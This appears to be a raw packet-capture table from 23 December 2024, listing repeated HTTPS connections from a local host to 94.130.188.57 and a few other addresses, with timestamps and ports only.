                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.724963903 CET4435002294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.726772070 CET50022443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.726797104 CET4435002294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.726819038 CET50022443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.726830006 CET4435002294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.729531050 CET4435002194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.729619980 CET4435002194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.729650974 CET50021443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.729676962 CET50021443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.730560064 CET50021443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:36.730577946 CET4435002194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.360544920 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.360588074 CET4435002894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.360645056 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.360959053 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.360971928 CET4435002894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.720319986 CET4435002294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.720395088 CET4435002294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.720422983 CET50022443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.720510960 CET50022443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.721324921 CET50022443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:37.721369028 CET4435002294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.355408907 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.355458975 CET4435003494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.355523109 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.355782986 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.355792999 CET4435003494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.759879112 CET4435002894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.759936094 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.770418882 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.770428896 CET4435002894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.772239923 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.772247076 CET4435002894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.772278070 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:38.772284031 CET4435002894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.753957987 CET4435003494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.754096985 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.756725073 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.756733894 CET4435003494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.759232044 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.759237051 CET4435003494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.759280920 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.759284973 CET4435003494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.769187927 CET4435002894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.769260883 CET4435002894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.769262075 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.769309044 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.770459890 CET50028443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:39.770474911 CET4435002894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.355803013 CET50041443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.355910063 CET4435004194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.356009960 CET50041443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.356292963 CET50041443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.356328964 CET4435004194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.780539989 CET4435003494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.780622959 CET4435003494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.780756950 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.781157970 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.784573078 CET50034443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:40.784636021 CET4435003494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.374176025 CET50042443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.374224901 CET4435004294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.374300003 CET50042443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.374557972 CET50042443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.374568939 CET4435004294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.769128084 CET4435004194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.769308090 CET50041443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.769944906 CET50041443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.769974947 CET4435004194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.780463934 CET50041443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.780487061 CET4435004194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.780525923 CET50041443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:41.780544043 CET4435004194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.754105091 CET4435004194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.754188061 CET50041443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.754204035 CET4435004194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.754261017 CET50041443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.755592108 CET50041443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.755626917 CET4435004194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.775785923 CET4435004294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.775913000 CET50042443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.776549101 CET50042443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.776562929 CET4435004294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.778424978 CET50042443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.778429985 CET4435004294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.778465986 CET50042443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:42.778474092 CET4435004294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.381917000 CET50048443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.381977081 CET4435004894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.382076979 CET50048443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.382405043 CET50048443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.382416964 CET4435004894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.802200079 CET4435004294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.802284956 CET4435004294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.802328110 CET50042443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.802356005 CET50042443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.803260088 CET50042443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:43.803282022 CET4435004294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:44.403506041 CET50051443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:44.403573990 CET4435005194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:44.403670073 CET50051443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:44.403918028 CET50051443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:44.403944016 CET4435005194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:44.786282063 CET4435004894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:44.786361933 CET50048443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:44.786870956 CET50048443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:44.786883116 CET4435004894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:44.788986921 CET50048443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:44.789000034 CET4435004894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:44.789028883 CET50048443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:44.789033890 CET4435004894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:45.809458017 CET4435005194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:45.809609890 CET50051443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:45.810354948 CET50051443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:45.810362101 CET4435005194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:45.812155962 CET50051443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:45.812160015 CET4435005194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:45.812217951 CET50051443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:45.812228918 CET4435005194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:45.821867943 CET4435004894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:45.821950912 CET4435004894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:45.821986914 CET50048443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:45.822051048 CET50048443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:45.822993994 CET50048443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:45.823035002 CET4435004894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:46.403949022 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:46.404040098 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:46.404165030 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:46.404441118 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:46.404465914 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:46.845779896 CET4435005194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:46.845829964 CET50051443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:46.845851898 CET4435005194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:46.845866919 CET4435005194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:46.845899105 CET50051443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:46.845921993 CET50051443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:46.846875906 CET50051443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:46.846894026 CET4435005194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:47.419476032 CET50061443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:47.419526100 CET4435006194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:47.419599056 CET50061443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:47.419851065 CET50061443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:47.419862032 CET4435006194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:47.805458069 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:47.805578947 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:47.806277037 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:47.806291103 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:47.808691025 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:47.808710098 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:47.808739901 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:47.808758974 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.825263023 CET4435006194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.825330019 CET50061443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.825820923 CET50061443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.825828075 CET4435006194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.828370094 CET50061443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.828375101 CET4435006194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.828408957 CET50061443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.828413963 CET4435006194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.839962959 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.840019941 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.840030909 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.840046883 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.840070009 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.840090990 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.840945005 CET50056443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.840960979 CET4435005694.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.915827990 CET49856443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.915863037 CET44349856172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.915868998 CET49857443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:48.915891886 CET44349857172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:49.430039883 CET50068443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:49.430073023 CET4435006894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:49.430165052 CET50068443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:49.430517912 CET50068443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:49.430527925 CET4435006894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:49.894947052 CET4435006194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:49.895030022 CET4435006194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:49.895173073 CET50061443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:49.896181107 CET50061443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:49.896203041 CET4435006194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.435736895 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.435786009 CET4435006994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.435878992 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.436217070 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.436229944 CET4435006994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.836570024 CET4435006894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.836667061 CET50068443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.837466955 CET50068443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.837481022 CET4435006894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.839828014 CET50068443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.839850903 CET4435006894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.839879036 CET50068443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.839886904 CET4435006894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.931493044 CET49908443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:50.931504011 CET44349908204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.054852962 CET49909443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.054872036 CET44349909204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.832015991 CET4435006994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.832076073 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.833560944 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.833581924 CET4435006994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.836462975 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.836481094 CET4435006994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.836503983 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.836515903 CET4435006994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.885555983 CET4435006894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.885634899 CET50068443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.885648012 CET4435006894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.885684967 CET50068443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.885804892 CET4435006894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.885869980 CET50068443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.886718988 CET50068443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:51.886745930 CET4435006894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.445044041 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.445143938 CET4435007594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.445236921 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.445560932 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.445605993 CET4435007594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.881607056 CET4435006994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.881685972 CET4435006994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.881716013 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.881738901 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.882736921 CET50069443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:52.882750988 CET4435006994.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.465558052 CET50081443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.465596914 CET4435008194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.465663910 CET50081443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.465939999 CET50081443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.465950966 CET4435008194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.848685980 CET4435007594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.848778963 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.849473000 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.849502087 CET4435007594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.851603985 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.851618052 CET4435007594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.851659060 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:53.851676941 CET4435007594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.865581036 CET4435008194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.865677118 CET50081443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.866170883 CET50081443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.866199970 CET4435008194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.868177891 CET50081443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.868182898 CET4435008194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.868211985 CET50081443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.868217945 CET4435008194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.879517078 CET4435007594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.879592896 CET4435007594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.879592896 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.879664898 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.880481005 CET50075443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.880518913 CET4435007594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.924274921 CET49906443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.924333096 CET49907443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.924350977 CET4434990623.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:54.924391031 CET4434990723.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.258764982 CET50084443192.168.2.523.44.201.40
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.258805037 CET4435008423.44.201.40192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.258897066 CET50084443192.168.2.523.44.201.40
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:58:55.259160042 CET50084443192.168.2.523.44.201.40
